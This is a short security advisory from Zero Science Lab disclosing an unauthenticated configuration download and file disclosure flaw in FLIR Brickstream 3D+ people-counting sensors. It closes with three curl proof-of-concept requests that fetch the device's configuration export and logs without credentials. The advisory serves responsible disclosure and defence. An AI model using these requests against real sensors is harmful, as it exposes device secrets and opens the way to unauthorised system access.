FLIR Systems FLIR Brickstream 3D+ Unauthenticated Config Download File Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.brickstream.com Affected version: Firmware: 2.1.742.1842 Api: 1.0.0 Node: 0.10.33 Onvif: 0.1.1.47 Summary: The Brickstream line of sensors provides highly accurate, anonymous information about how people move into, around, and out of physical places. These smart devices are installed overhead inside retail stores, malls, banks, stadiums, transportation terminals and other brick-and-mortar locations to measure people's behaviors within the space. Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config download and file disclosure vulnerability when calling the ExportConfig REST API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: Titan Api/1.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2018-5495 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php 26.07.2018 -- $ curl http://192.168.2.1:8083/getConfigExportFile.cgi $ curl http://192.168.2.1:8083/restapi/system/ExportConfig $ curl http://192.168.2.1:8083/restapi/system/ExportLogs